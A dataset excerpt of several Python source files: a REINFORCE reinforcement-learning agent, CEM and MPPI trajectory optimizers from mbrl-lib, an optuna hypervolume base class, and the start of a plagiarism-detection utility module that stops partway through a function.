ERASE_LINE = default_variables_dict["ERASE_LINE"]
class REINFORCE:
def __init__(self):
self.policy_model_fn = lambda nS, nA: PolicyNet(nS, nA, hidden_dims=(128, 64))
self.policy_optimizer_fn = lambda net, lr: optim.Adam(net.parameters(), lr=lr)
self.policy_optimizer_lr = 0.0005
def optimize_model(self):
T = len(self.rewards)
discounts = np.logspace(0, T, num=T, base=self.gamma, endpoint=False)
returns = np.array([np.sum(discounts[: T -t] * self.rewards[t:]) for t in range(T)])
discounts = torch.FloatTensor(discounts).unsqueeze(1)
returns = torch.FloatTensor(returns).unsqueeze(1)
self.logpas = torch.cat(self.logpas) # log probability of the actions selected
# pytorch does gradient descent by default --> minimizing negative performance is like max. performance
# log probability of actions selected is weighted by their discounted returns
policy_loss = -(discounts * returns * self.logpas).mean()
self.policy_optimizer.zero_grad()
policy_loss.backward()
self.policy_optimizer.step()
def interaction_step(self, state, env):
action, is_exploratory, logpa, _ = self.policy_model.full_pass(state)
new_state, reward, is_terminal, _ = env.step(action)
self.logpas.append(logpa)
self.rewards.append(reward)
self.episode_reward[-1] += reward
self.episode_timestep[-1] += 1
self.episode_exploration[-1] += int(is_exploratory)
return new_state, is_terminal
# this function is the entry point for training the agent
def train(self, make_env_fn, make_env_kargs, seed, gamma,
max_minutes, max_episodes, goal_mean_100_reward):
training_start, last_debug_time = time.time(), float('-inf')
self.checkpoint_dir = tempfile.mkdtemp()
self.make_env_fn = make_env_fn
self.make_env_kargs = make_env_kargs
self.seed = seed
self.gamma = gamma
env = self.make_env_fn(**self.make_env_kargs, seed=self.seed)
torch.manual_seed(self.seed) ; np.random.seed(self.seed) ; random.seed(self.seed)
state_dim, acts_dim = env.observation_space.shape[0], env.action_space.n
self.episode_timestep = []
self.episode_reward = []
self.episode_seconds = []
self.episode_exploration = []
self.evaluation_scores = []
self.policy_model = self.policy_model_fn(state_dim, acts_dim)
self.policy_optimizer = self.policy_optimizer_fn(self.policy_model,
self.policy_optimizer_lr)
result = np.empty((max_episodes, 5))
result[:] = np.nan
training_time = 0
for episode in range(1, max_episodes + 1):
episode_start = time.time()
state, is_terminal = env.reset(), False
self.episode_reward.append(0.0)
self.episode_timestep.append(0.0)
self.episode_exploration.append(0.0)
# collect rollout
self.logpas, self.rewards = [], []
for step in count():
state, is_terminal = self.interaction_step(state, env)
if is_terminal:
gc.collect()
break
self.optimize_model()
# stats
episode_elapsed = time.time() - episode_start
self.episode_seconds.append(episode_elapsed)
training_time += episode_elapsed
evaluation_score, _ = self.evaluate(self.policy_model, env)
utils.save_checkpoint(self.checkpoint_dir, episode-1, self.policy_model)
total_step = int(np.sum(self.episode_timestep))
self.evaluation_scores.append(evaluation_score)
mean_10_reward = np.mean(self.episode_reward[-10:])
std_10_reward = np.std(self.episode_reward[-10:])
mean_100_reward = np.mean(self.episode_reward[-100:])
std_100_reward = np.std(self.episode_reward[-100:])
mean_100_eval_score = np.mean(self.evaluation_scores[-100:])
std_100_eval_score = np.std(self.evaluation_scores[-100:])
lst_100_exp_rat = np.array(
self.episode_exploration[-100:] ) /np.array(self.episode_timestep[-100:])
mean_100_exp_rat = np.mean(lst_100_exp_rat)
std_100_exp_rat = np.std(lst_100_exp_rat)
wallclock_elapsed = time.time() - training_start
result[episode -1] = total_step, mean_100_reward, \
mean_100_eval_score, training_time, wallclock_elapsed
reached_debug_time = time.time() - last_debug_time >= LEAVE_PRINT_EVERY_N_SECS
reached_max_minutes = wallclock_elapsed >= max_minutes * 60
reached_max_episodes = episode >= max_episodes
reached_goal_mean_reward = mean_100_eval_score >= goal_mean_100_reward
training_is_over = reached_max_minutes or \
reached_max_episodes or \
reached_goal_mean_reward
elapsed_str = time.strftime("%H:%M:%S", time.gmtime(time.time() - training_start))
debug_message = 'el {}, ep {:04}, ts {:06}, '
debug_message += 'ar 10 {:05.1f}\u00B1{:05.1f}, '
debug_message += '100 {:05.1f}\u00B1{:05.1f}, '
debug_message += 'ex 100 {:02.1f}\u00B1{:02.1f}, '
debug_message += 'ev {:05.1f}\u00B1{:05.1f}'
debug_message = debug_message.format(
elapsed_str, episode -1, total_step, mean_10_reward, std_10_reward,
mean_100_reward, std_100_reward, mean_100_exp_rat, std_100_exp_rat,
mean_100_eval_score, std_100_eval_score)
print(debug_message, end='\r', flush=True)
if reached_debug_time or training_is_over:
print(ERASE_LINE + debug_message, flush=True)
last_debug_time = time.time()
if training_is_over:
if reached_max_minutes: print(u'--> reached_max_minutes \u2715')
if reached_max_episodes: print(u'--> reached_max_episodes \u2715')
if reached_goal_mean_reward: print(u'--> reached_goal_mean_reward \u2713')
break
final_eval_score, score_std = self.evaluate(self.policy_model, env, n_episodes=100)
wallclock_time = time.time() - training_start
print('Training complete.')
print('Final evaluation score {:.2f}\u00B1{:.2f} in {:.2f}s training time,'
' {:.2f}s wall-clock time.\n'.format(
final_eval_score, score_std, training_time, wallclock_time))
env.close() ; del env
self.get_cleaned_checkpoints()
return result, final_eval_score, training_time, wallclock_time
def evaluate(self, eval_policy_model, eval_env, n_episodes=1, greedy=True):
rs = []
for _ in range(n_episodes):
s, d = eval_env.reset(), False
rs.append(0)
for _ in count():
if greedy:
a = eval_policy_model.select_greedy_action(s)
else:
a = eval_policy_model.select_action(s)
s, r, d, _ = eval_env.step(a)
rs[-1] += r
if d: break
return np.mean(rs), np.std(rs)
def get_cleaned_checkpoints(self, n_checkpoints=5):
try:
return self.checkpoint_paths
except AttributeError:
self.checkpoint_paths = {}
paths = glob.glob(os.path.join(self.checkpoint_dir, '*.tar'))
paths_dic = {int(path.split('.')[-2]) :path for path in paths}
last_ep = max(paths_dic.keys())
# checkpoint_idxs = np.geomspace(1, last_ep+1, n_checkpoints, endpoint=True, dtype=np.int)-1
checkpoint_idxs = np.linspace(1, last_ep+1, n_checkpoints, endpoint=True, dtype=np.int) -1
for idx, path in paths_dic.items():
if idx in checkpoint_idxs:
self.checkpoint_paths[idx] = path
else:
os.unlink(path)
return self.checkpoint_paths
def demo_last(self, title='{} Agent - Fully Trained ', n_episodes=3, max_n_videos=3):
env = self.make_env_fn(**self.make_env_kargs, monitor_mode='evaluation', render=True, record=True)
title = title.format(self.__class__.__name__)
checkpoint_paths = self.get_cleaned_checkpoints()
last_ep = max(checkpoint_paths.keys())
self.policy_model.load_state_dict(torch.load(checkpoint_paths[last_ep]))
self.evaluate(self.policy_model, env, n_episodes=n_episodes)
env.close()
html_data = utils.get_gif_html(env_videos=env.videos,
title=title,
max_n_videos=max_n_videos)
del env
return html_data, title
def demo_progression(self, title='{} Agent - Progression', max_n_videos=5):
env = self.make_env_fn(**self.make_env_kargs, monitor_mode='evaluation', render=True, record=True)
title = title.format(self.__class__.__name__)
checkpoint_paths = self.get_cleaned_checkpoints()
for i in sorted(checkpoint_paths.keys()):
self.policy_model.load_state_dict(torch.load(checkpoint_paths[i]))
self.evaluate(self.policy_model, env, n_episodes=1)
env.close()
html_data = utils.get_gif_html(env_videos=env.videos,
title=title,
subtitle_eps=sorted(checkpoint_paths.keys()),
max_n_videos=max_n_videos)
del env
return html_data, title
class PolicyNet(nn.Module):
def __init__(self,
input_dim,
output_dim,
hidden_dims=(32, 32),
activation_fc=F.relu):
super(PolicyNet, self).__init__()
self.activation_fc = activation_fc
self.input_layer = nn.Linear(input_dim, hidden_dims[0])
self.hidden_layers = nn.ModuleList()
for i in range(len(hidden_dims) - 1):
hidden_layer = nn.Linear(hidden_dims[i], hidden_dims[i + 1])
self.hidden_layers.append(hidden_layer)
self.output_layer = nn.Linear(hidden_dims[-1], output_dim)
def _format(self, state):
x = state
if not isinstance(x, torch.Tensor):
x = torch.tensor(x,
dtype=torch.float32)
x = x.unsqueeze(0)
return x
def forward(self, state):
x = self._format(state)
x = self.activation_fc(self.input_layer(x))
for hidden_layer in self.hidden_layers:
x = self.activation_fc(hidden_layer(x))
return self.output_layer(x)
def full_pass(self, state):
logits = self.forward(state)
dist = torch.distributions.Categorical(logits=logits)
action = dist.sample()
logpa = dist.log_prob(action).unsqueeze(-1)
entropy = dist.entropy().unsqueeze(-1)
is_exploratory = action != np.argmax(logits.detach().numpy())
return action.item(), is_exploratory.item(), logpa, entropy
def select_action(self, state):
logits = self.forward(state)
dist = torch.distributions.Categorical(logits=logits)
action = dist.sample()
return action.item()
def select_greedy_action(self, state):
logits = self.forward(state)
return np.argmax(logits.detach().numpy())
```
|
{
"source": "Jeyhooon/mbrl-lib",
"score": 3
}
|
#### File: mbrl/planning/trajectory_opt.py
```python
import time
from typing import Callable, List, Optional, Sequence, cast
import hydra
import numpy as np
import omegaconf
import torch
import torch.distributions
import mbrl.models
import mbrl.types
import mbrl.util.math
from .core import Agent, complete_agent_cfg
class Optimizer:
def __init__(self):
pass
def optimize(
self,
obj_fun: Callable[[torch.Tensor], torch.Tensor],
x0: Optional[torch.Tensor] = None,
**kwargs,
) -> torch.Tensor:
"""Runs optimization.
Args:
obj_fun (callable(tensor) -> tensor): objective function to maximize.
x0 (tensor, optional): initial solution, if necessary.
Returns:
(torch.Tensor): the best solution found.
"""
pass
class CEMOptimizer(Optimizer):
"""Implements the Cross-Entropy Method optimization algorithm.
A good description of CEM [1] can be found at https://arxiv.org/pdf/2008.06389.pdf. This
code implements the version described in Section 2.1, labeled CEM_PETS
(but note that the shift-initialization between planning time steps is handled outside of
this class by TrajectoryOptimizer).
This implementation also returns the best solution found as opposed
to the mean of the last generation.
Args:
num_iterations (int): the number of iterations (generations) to perform.
elite_ratio (float): the proportion of the population that will be kept as
elite (rounds up).
population_size (int): the size of the population.
lower_bound (sequence of floats): the lower bound for the optimization variables.
upper_bound (sequence of floats): the upper bound for the optimization variables.
alpha (float): momentum term.
device (torch.device): device where computations will be performed.
return_mean_elites (bool): if ``True`` returns the mean of the elites of the last
iteration. Otherwise, it returns the max solution found over all iterations.
[1] <NAME> and <NAME>. "The cross-entropy method for combinatorial and continuous
optimization". Methodology and Computing in Applied Probability, 1999.
"""
def __init__(
self,
num_iterations: int,
elite_ratio: float,
population_size: int,
lower_bound: Sequence[Sequence[float]],
upper_bound: Sequence[Sequence[float]],
alpha: float,
device: torch.device,
return_mean_elites: bool = False,
):
super().__init__()
self.num_iterations = num_iterations
self.elite_ratio = elite_ratio
self.population_size = population_size
self.elite_num = np.ceil(self.population_size * self.elite_ratio).astype(
np.int32
)
self.lower_bound = torch.tensor(lower_bound, device=device, dtype=torch.float32)
self.upper_bound = torch.tensor(upper_bound, device=device, dtype=torch.float32)
self.initial_var = ((self.upper_bound - self.lower_bound) ** 2) / 16
self.alpha = alpha
self.return_mean_elites = return_mean_elites
self.device = device
def optimize(
self,
obj_fun: Callable[[torch.Tensor], torch.Tensor],
x0: Optional[torch.Tensor] = None,
callback: Optional[Callable[[torch.Tensor, torch.Tensor, int], None]] = None,
**kwargs,
) -> torch.Tensor:
"""Runs the optimization using CEM.
Args:
obj_fun (callable(tensor) -> tensor): objective function to maximize.
x0 (tensor, optional): initial mean for the population. Must
be consistent with lower/upper bounds.
callback (callable(tensor, tensor, int) -> any, optional): if given, this
function will be called after every iteration, passing it as input the full
population tensor, its corresponding objective function values, and
the index of the current iteration. This can be used for logging and plotting
purposes.
Returns:
(torch.Tensor): the best solution found.
"""
mu = x0.clone()
var = self.initial_var.clone()
best_solution = torch.empty_like(mu)
best_value = -np.inf
population = torch.zeros((self.population_size,) + x0.shape).to(
device=self.device
)
for i in range(self.num_iterations):
lb_dist = mu - self.lower_bound
ub_dist = self.upper_bound - mu
mv = torch.min(torch.square(lb_dist / 2), torch.square(ub_dist / 2))
constrained_var = torch.min(mv, var)
population = mbrl.util.math.truncated_normal_(population)
population = population * torch.sqrt(constrained_var) + mu
values = obj_fun(population)
if callback is not None:
callback(population, values, i)
# filter out NaN values
values[values.isnan()] = -1e-10
best_values, elite_idx = values.topk(self.elite_num)
elite = population[elite_idx]
new_mu = torch.mean(elite, dim=0)
new_var = torch.var(elite, unbiased=False, dim=0)
mu = self.alpha * mu + (1 - self.alpha) * new_mu
var = self.alpha * var + (1 - self.alpha) * new_var
if best_values[0] > best_value:
best_value = best_values[0]
best_solution = population[elite_idx[0]].clone()
return mu if self.return_mean_elites else best_solution
class MPPIOptimizer(Optimizer):
"""Implements the Model Predictive Path Integral optimization algorithm.
A derivation of MPPI can be found at https://arxiv.org/abs/2102.09027
This version is closely related to the original TF implementation used in PDDM with
some noise sampling modifications and the addition of refinement steps.
Args:
num_iterations (int): the number of iterations (generations) to perform.
population_size (int): the size of the population.
gamma (float): reward scaling term.
sigma (float): noise scaling term used in action sampling.
beta (float): correlation term between time steps.
lower_bound (sequence of floats): the lower bound for the optimization variables.
upper_bound (sequence of floats): the upper bound for the optimization variables.
device (torch.device): device where computations will be performed.
"""
def __init__(
self,
num_iterations: int,
population_size: int,
gamma: float,
sigma: float,
beta: float,
lower_bound: Sequence[Sequence[float]],
upper_bound: Sequence[Sequence[float]],
device: torch.device,
):
super().__init__()
self.planning_horizon = len(lower_bound)
self.population_size = population_size
self.action_dimension = len(lower_bound[0])
self.mean = torch.zeros(
(self.planning_horizon, self.action_dimension),
device=device,
dtype=torch.float32,
)
self.lower_bound = torch.tensor(lower_bound, device=device, dtype=torch.float32)
self.upper_bound = torch.tensor(upper_bound, device=device, dtype=torch.float32)
self.var = sigma ** 2 * torch.ones_like(self.lower_bound)
self.beta = beta
self.gamma = gamma
self.refinements = num_iterations
self.device = device
def optimize(
self,
obj_fun: Callable[[torch.Tensor], torch.Tensor],
x0: Optional[torch.Tensor] = None,
callback: Optional[Callable[[torch.Tensor, torch.Tensor, int], None]] = None,
**kwargs,
) -> torch.Tensor:
"""Implementation of MPPI planner.
Args:
obj_fun (callable(tensor) -> tensor): objective function to maximize.
x0 (tensor, optional): Not required
callback (callable(tensor, tensor, int) -> any, optional): if given, this
function will be called after every iteration, passing it as input the full
population tensor, its corresponding objective function values, and
the index of the current iteration. This can be used for logging and plotting
purposes.
Returns:
(torch.Tensor): the best solution found.
"""
past_action = self.mean[0]
self.mean[:-1] = self.mean[1:].clone()
for k in range(self.refinements):
# sample noise and update constrained variances
noise = torch.empty(
size=(
self.population_size,
self.planning_horizon,
self.action_dimension,
),
device=self.device,
)
noise = mbrl.util.math.truncated_normal_(noise)
lb_dist = self.mean - self.lower_bound
ub_dist = self.upper_bound - self.mean
mv = torch.minimum(torch.square(lb_dist / 2), torch.square(ub_dist / 2))
constrained_var = torch.minimum(mv, self.var)
population = noise.clone() * torch.sqrt(constrained_var)
# smoothed actions with noise
population[:, 0, :] = (
self.beta * (self.mean[0, :] + noise[:, 0, :])
+ (1 - self.beta) * past_action
)
for i in range(max(self.planning_horizon - 1, 0)):
population[:, i + 1, :] = (
self.beta * (self.mean[i + 1] + noise[:, i + 1, :])
+ (1 - self.beta) * population[:, i, :]
)
# clipping actions
# This should still work if the bounds between dimensions are different.
population = torch.where(
population > self.upper_bound, self.upper_bound, population
)
population = torch.where(
population < self.lower_bound, self.lower_bound, population
)
values = obj_fun(population)
values[values.isnan()] = -1e-10
if callback is not None:
callback(population, values, k)
# weight actions
weights = torch.reshape(
torch.exp(self.gamma * (values - values.max())),
(self.population_size, 1, 1),
)
norm = torch.sum(weights) + 1e-10
weighted_actions = population * weights
self.mean = torch.sum(weighted_actions, dim=0) / norm
return self.mean.clone()
class TrajectoryOptimizer:
"""Class for using generic optimizers on trajectory optimization problems.
This is a convenience class that sets up optimization problem for trajectories, given only
action bounds and the length of the horizon. Using this class, the concern of handling
appropriate tensor shapes for the optimization problem is hidden from the users, which only
need to provide a function that is capable of evaluating trajectories of actions. It also
takes care of shifting previous solution for the next optimization call, if the user desires.
The optimization variables for the problem will have shape ``H x A``, where ``H`` and ``A``
represent planning horizon and action dimension, respectively. The initial solution for the
optimizer will be computed as (action_ub - action_lb) / 2, for each time step.
Args:
optimizer_cfg (omegaconf.DictConfig): the configuration of the optimizer to use.
action_lb (np.ndarray): the lower bound for actions.
action_ub (np.ndarray): the upper bound for actions.
planning_horizon (int): the length of the trajectories that will be optimized.
replan_freq (int): the frequency of re-planning. This is used for shifting the previous
solution for the next time step, when ``keep_last_solution == True``. Defaults to 1.
keep_last_solution (bool): if ``True``, the last solution found by a call to
:meth:`optimize` is kept as the initial solution for the next step. This solution is
shifted ``replan_freq`` time steps, and the new entries are filled using th3 initial
solution. Defaults to ``True``.
"""
def __init__(
self,
optimizer_cfg: omegaconf.DictConfig,
action_lb: np.ndarray,
action_ub: np.ndarray,
planning_horizon: int,
replan_freq: int = 1,
keep_last_solution: bool = True,
):
optimizer_cfg.lower_bound = np.tile(action_lb, (planning_horizon, 1)).tolist()
optimizer_cfg.upper_bound = np.tile(action_ub, (planning_horizon, 1)).tolist()
self.optimizer: Optimizer = hydra.utils.instantiate(optimizer_cfg)
self.initial_solution = (
((torch.tensor(action_lb) + torch.tensor(action_ub)) / 2)
.float()
.to(optimizer_cfg.device)
)
self.initial_solution = self.initial_solution.repeat((planning_horizon, 1))
self.previous_solution = self.initial_solution.clone()
self.replan_freq = replan_freq
self.keep_last_solution = keep_last_solution
self.horizon = planning_horizon
def optimize(
self,
trajectory_eval_fn: Callable[[torch.Tensor], torch.Tensor],
callback: Optional[Callable] = None,
) -> np.ndarray:
"""Runs the trajectory optimization.
Args:
trajectory_eval_fn (callable(tensor) -> tensor): A function that receives a batch
of action sequences and returns a batch of objective function values (e.g.,
accumulated reward for each sequence). The shape of the action sequence tensor
will be ``B x H x A``, where ``B``, ``H``, and ``A`` represent batch size,
planning horizon, and action dimension, respectively.
callback (callable, optional): a callback function
to pass to the optimizer.
Returns:
(tuple of np.ndarray and float): the best action sequence.
"""
best_solution = self.optimizer.optimize(
trajectory_eval_fn,
x0=self.previous_solution,
callback=callback,
)
if self.keep_last_solution:
self.previous_solution = best_solution.roll(-self.replan_freq, dims=0)
# Note that initial_solution[i] is the same for all values of [i],
# so just pick i = 0
self.previous_solution[-self.replan_freq :] = self.initial_solution[0]
return best_solution.cpu().numpy()
def reset(self):
"""Resets the previous solution cache to the initial solution."""
self.previous_solution = self.initial_solution.clone()
class TrajectoryOptimizerAgent(Agent):
"""Agent that performs trajectory optimization on a given objective function for each action.
This class uses an internal :class:`TrajectoryOptimizer` object to generate
sequence of actions, given a user-defined trajectory optimization function.
Args:
optimizer_cfg (omegaconf.DictConfig): the configuration of the base optimizer to pass to
the trajectory optimizer.
action_lb (sequence of floats): the lower bound of the action space.
action_ub (sequence of floats): the upper bound of the action space.
planning_horizon (int): the length of action sequences to evaluate. Defaults to 1.
replan_freq (int): the frequency of re-planning. The agent will keep a cache of the
generated sequences an use it for ``replan_freq`` number of :meth:`act` calls.
Defaults to 1.
verbose (bool): if ``True``, prints the planning time on the console.
Note:
After constructing an agent of this type, the user must call
:meth:`set_trajectory_eval_fn`. This is not passed to the constructor so that the agent can
be automatically instantiated with Hydra (which in turn makes it easy to replace this
agent with an agent of another type via config-only changes).
"""
def __init__(
self,
optimizer_cfg: omegaconf.DictConfig,
action_lb: Sequence[float],
action_ub: Sequence[float],
planning_horizon: int = 1,
replan_freq: int = 1,
verbose: bool = False,
):
self.optimizer = TrajectoryOptimizer(
optimizer_cfg,
np.array(action_lb),
np.array(action_ub),
planning_horizon=planning_horizon,
replan_freq=replan_freq,
)
self.optimizer_args = {
"optimizer_cfg": optimizer_cfg,
"action_lb": np.array(action_lb),
"action_ub": np.array(action_ub),
}
self.trajectory_eval_fn: mbrl.types.TrajectoryEvalFnType = None
self.actions_to_use: List[np.ndarray] = []
self.replan_freq = replan_freq
self.verbose = verbose
def set_trajectory_eval_fn(
self, trajectory_eval_fn: mbrl.types.TrajectoryEvalFnType
):
"""Sets the trajectory evaluation function.
Args:
trajectory_eval_fn (callable): a trajectory evaluation function, as described in
:class:`TrajectoryOptimizer`.
"""
self.trajectory_eval_fn = trajectory_eval_fn
def reset(self, planning_horizon: Optional[int] = None):
"""Resets the underlying trajectory optimizer."""
if planning_horizon:
self.optimizer = TrajectoryOptimizer(
cast(omegaconf.DictConfig, self.optimizer_args["optimizer_cfg"]),
cast(np.ndarray, self.optimizer_args["action_lb"]),
cast(np.ndarray, self.optimizer_args["action_ub"]),
planning_horizon=planning_horizon,
replan_freq=self.replan_freq,
)
self.optimizer.reset()
def act(self, obs: np.ndarray, **_kwargs) -> np.ndarray:
"""Issues an action given an observation.
This method optimizes a full sequence of length ``self.planning_horizon`` and returns
the first action in the sequence. If ``self.replan_freq > 1``, future calls will use
subsequent actions in the sequence, for ``self.replan_freq`` number of steps.
After that, the method will plan again, and repeat this process.
Args:
obs (np.ndarray): the observation for which the action is needed.
Returns:
(np.ndarray): the action.
"""
if self.trajectory_eval_fn is None:
raise RuntimeError(
"Please call `set_trajectory_eval_fn()` before using TrajectoryOptimizerAgent"
)
plan_time = 0.0
if not self.actions_to_use: # re-plan is necessary
def trajectory_eval_fn(action_sequences):
return self.trajectory_eval_fn(obs, action_sequences)
start_time = time.time()
plan = self.optimizer.optimize(trajectory_eval_fn)
plan_time = time.time() - start_time
self.actions_to_use.extend([a for a in plan[: self.replan_freq]])
action = self.actions_to_use.pop(0)
if self.verbose:
print(f"Planning time: {plan_time:.3f}")
return action
def plan(self, obs: np.ndarray, **_kwargs) -> np.ndarray:
"""Issues a sequence of actions given an observation.
Returns s sequence of length self.planning_horizon.
Args:
obs (np.ndarray): the observation for which the sequence is needed.
Returns:
(np.ndarray): a sequence of actions.
"""
if self.trajectory_eval_fn is None:
raise RuntimeError(
"Please call `set_trajectory_eval_fn()` before using TrajectoryOptimizerAgent"
)
def trajectory_eval_fn(action_sequences):
return self.trajectory_eval_fn(obs, action_sequences)
plan = self.optimizer.optimize(trajectory_eval_fn)
return plan
def create_trajectory_optim_agent_for_model(
model_env: mbrl.models.ModelEnv,
agent_cfg: omegaconf.DictConfig,
num_particles: int = 1,
) -> TrajectoryOptimizerAgent:
"""Utility function for creating a trajectory optimizer agent for a model environment.
This is a convenience function for creating a :class:`TrajectoryOptimizerAgent`,
using :meth:`mbrl.models.ModelEnv.evaluate_action_sequences` as its objective function.
Args:
model_env (mbrl.models.ModelEnv): the model environment.
agent_cfg (omegaconf.DictConfig): the agent's configuration.
num_particles (int): the number of particles for taking averages of action sequences'
total rewards.
Returns:
(:class:`TrajectoryOptimizerAgent`): the agent.
"""
complete_agent_cfg(model_env, agent_cfg)
agent = hydra.utils.instantiate(agent_cfg)
def trajectory_eval_fn(initial_state, action_sequences):
return model_env.evaluate_action_sequences(
action_sequences, initial_state=initial_state, num_particles=num_particles
)
agent.set_trajectory_eval_fn(trajectory_eval_fn)
return agent
```
|
{
"source": "Jeyhooon/optuna",
"score": 4
}
|
#### File: multi_objective/_hypervolume/base.py
```python
import abc
import numpy as np
class BaseHypervolume(object, metaclass=abc.ABCMeta):
"""Base class for hypervolume calculators.
.. note::
This class is used for computing the hypervolumes of points in multi-objective space.
Each coordinate of each point represents one value of the multi-objective function.
.. note::
We check that each objective is to be minimized. Transform objective values that are
to be maximized before calling this class's ``compute`` method.
Example:
.. testcode::
import numpy as np
import optuna
from optuna.multi_objective._hypervolume import WFG
def objective(trial):
return trial.suggest_float("x", 0, 1), trial.suggest_float("y", 0, 1)
study = optuna.multi_objective.create_study(["maximize", "minimize"])
study.optimize(objective, n_trials=10)
trials = study.get_pareto_front_trials()
solution_sets = np.array([list(t.values) for t in trials])
# Normalize the solution set by negating.
solution_sets = np.array([[-s[0], s[1]] for s in solution_sets])
# A reference point is dominated by all points.
reference_point = np.max(solution_sets, axis=0) + 1
hypervolume = WFG().compute(solution_sets, reference_point)
print("Hypervolume of the Pareto solutions is {}.".format(hypervolume))
"""
def compute(self, solution_set: np.ndarray, reference_point: np.ndarray) -> float:
"""Compute the hypervolume for the given solution set and reference point.
.. note::
We assume that all points in the solution set dominate or equal the reference point.
In other words, for all points in the solution set and the coordinate ``i``,
``point[i] <= reference_point[i]``.
Args:
solution_set:
The solution set which we want to compute the hypervolume.
reference_point:
The reference point to compute the hypervolume.
"""
self._validate(solution_set, reference_point)
return self._compute(solution_set, reference_point)
@staticmethod
def _validate(solution_set: np.ndarray, reference_point: np.ndarray) -> None:
# Validates that all points in the solution set dominate or equal the reference point.
if not (solution_set <= reference_point).all():
raise ValueError(
"All points must dominate or equal the reference point. "
"That is, for all points in the solution_set and the coordinate `i`, "
"`point[i] <= reference_point[i]`."
)
@abc.abstractmethod
def _compute(self, solution_set: np.ndarray, reference_point: np.ndarray) -> float:
raise NotImplementedError
```
|
{
"source": "Jeyhun023/plagiarism-detect",
"score": 3
}
|
#### File: plagiarism-detect/plagiarismdetect/utils.py
```python
from pygments import lexers, token
import pygments.util
import numpy as np
import logging
from markupsafe import escape
# if the C extention is available, use it. For almost all use cases
# the speed difference is not significant so if the C extention isn't
# found copydetect will silenty switch to the python implementation.
try:
from .winnow import _winnow
except (ModuleNotFoundError, ImportError):
from .pywinnow import _winnow
def filter_code(code, filename, language=None):
"""Tokenize and filter a code document. Replace variable names with
V, function names with F, object names with O, and strings with S.
Return the filtered document and a list of offsets indicating how
many characters were removed by filtering at each index in the
resulting document where filtering occured (this is used later to
highlight the original code using plagiarism detection results on
the filtered code)
"""
try:
if language is not None:
lexer = lexers.get_lexer_by_name(language)
else:
lexer = lexers.get_lexer_for_filename(filename)
tokens = lexer.get_tokens(code)
except pygments.util.ClassNotFound:
logging.warning(f"{filename} not tokenized: unknown file extension")
return code, np.array([])
if lexer == pygments.lexers.TextLexer:
logging.warning(f"did not tokenize plaintext file {filename}")
return code, np.array([])
out_code = ""
offset = 0
offsets = [[0,0]]
variable_tokens = {token.Name, token.Name.Variable, token.Name.Attribute}
for t in tokens:
if t[0] in variable_tokens:
out_code += "V"
offsets.append([len(out_code) - 1, offset])
offset += len(t[1]) - 1
elif t[0] in token.Name.Function:
out_code += "F"
offsets.append([len(out_code) - 1, offset])
offset += len(t[1]) - 1
elif t[0] in token.Name.Class:
out_code += "O"
offsets.append([len(out_code) - 1, len(t[1]) - 1])
offset += len(t[1]) - 1
elif t[0] == token.Comment.Preproc or t[0] == token.Comment.Hashbang:
out_code += "P"
offsets.append([len(out_code) - 1, offset])
offset += len(t[1]) - 1
elif t[0] in token.Text or t[0] in token.Comment:
offsets.append([len(out_code) - 1, offset])
offset += len(t[1])
elif t[0] in token.Literal.String:
if t[1] == "'" or t[1] == '"':
out_code += '"'
else:
out_code += "S"
offsets.append([len(out_code) - 1, offset])
offset += len(t[1]) - 1
else:
out_code += t[1]
return out_code, np.array(offsets)
def hashed_kgrams(string, k):
"""Return hashes of all k-grams in a string"""
hashes = [hash(string[offset:offset+k])
for offset in range(len(string) - k + 1)]
return np.array(hashes)
def winnow(hashes, window_size, remove_duplicates=True):
"""implementation of the robust winnowing algorithm decribed in
https://theory.stanford.edu/~aiken/publications/papers/sigmod03.pdf
Returns a list of selected hashes and the indexes of those hashes.
"""
if window_size < 1:
raise ValueError("window_size must be greater than 0")
# window size of 1 will just select all hashes
if window_size == 1:
selected_hashes = hashes
selected_idx = np.arange(len(hashes))
else:
selected_idx = _winnow(hashes, window_size)
selected_hashes = hashes[selected_idx]
if remove_duplicates:
selected_hashes, unique_idx = np.unique(selected_hashes,
return_index=True)
selected_idx = selected_idx[unique_idx]
return selected_hashes, selected_idx
def get_copied_slices(idx, k):
"""Given k and a list of indexes detected by
find_fingerprint_overlap, generates a list of slices where the
copied code begins and ends. Returns a 2D array where the first
dimension is slice start locations and the second dimension is
slice end locations.
"""
if len(idx) == 0:
return np.array([[],[]])
# determine the gaps between slices (called skips)
sorted_idx = np.sort(idx)
next_idx = np.concatenate([sorted_idx[1:], [0]])
skips = np.where(next_idx - sorted_idx > k - 1)[0]
# use the elements around the gaps to compute slice start/ends
slice_starts = np.concatenate([[sorted_idx[0]], sorted_idx[skips + 1]])
slice_ends = np.concatenate([sorted_idx[skips]+k, [sorted_idx[-1]+k]])
return np.array([slice_starts, slice_ends])
def get_document_fingerprints(doc, k, window_size, boilerplate=[]):
"""Given a document, computes all k-gram hashes and uses the
winnowing algorithm to reduce their number. Optionally takes a
list of boilerplate hashes to remove from the winnowed list.
Returns the selected hashes and their indexes in the original list
"""
hashes, idx = winnow(hashed_kgrams(doc, k=k), window_size=window_size)
if len(boilerplate) > 0:
_, overlap_idx, _ = np.intersect1d(hashes, boilerplate,
return_indices=True,
assume_unique=True)
idx = np.delete(idx, overlap_idx)
hashes = np.delete(hashes, overlap_idx)
return hashes, idx
def find_fingerprint_overlap(hashes1, hashes2, idx1, idx2):
"""Finds the indexes of overlapping values between two lists of
hashes. Returns two lists of indexes, one for the first hash list
and one for the second. The indexes of the original hashes are
provided in case boilerplate results in gaps.
"""
overlap, ol_idx1, ol_idx2 = np.intersect1d(hashes1, hashes2,
return_indices=True, assume_unique=True)
return idx1[ol_idx1], idx2[ol_idx2]
def highlight_overlap(doc, slices, left_hl, right_hl,
truncate=-1, escape_html=False):
"""Highlights copied code in a document given the slices containing
copied code and strings to use for the highlight start and end.
Returns the document annoted with the highlight strings as well as
the percentage of code which was highlighted. If truncate is set to
an integer, everything not within that many lines of highlighted
code will be replaced with "..."
"""
hl_percent = np.sum(slices[1] - slices[0])/len(doc)
new_doc = ""
current_idx = 0
for slice_idx in range(slices.shape[1]):
start_idx = slices[0,slice_idx]
end_idx = slices[1,slice_idx]
if escape_html:
pre_highlight = str(escape(doc[current_idx:start_idx]))
highlighted = left_hl+str(escape(doc[start_idx:end_idx]))+right_hl
else:
pre_highlight = doc[current_idx:start_idx]
highlighted = left_hl + doc[start_idx:end_idx] + right_hl
if truncate >= 0:
lines = pre_highlight.split("\n")
if slice_idx != 0 and len(lines) > truncate*2:
pre_highlight = ("\n".join(lines[:truncate+1]) + "\n\n...\n\n"
+ "\n".join(lines[-truncate - 1:]))
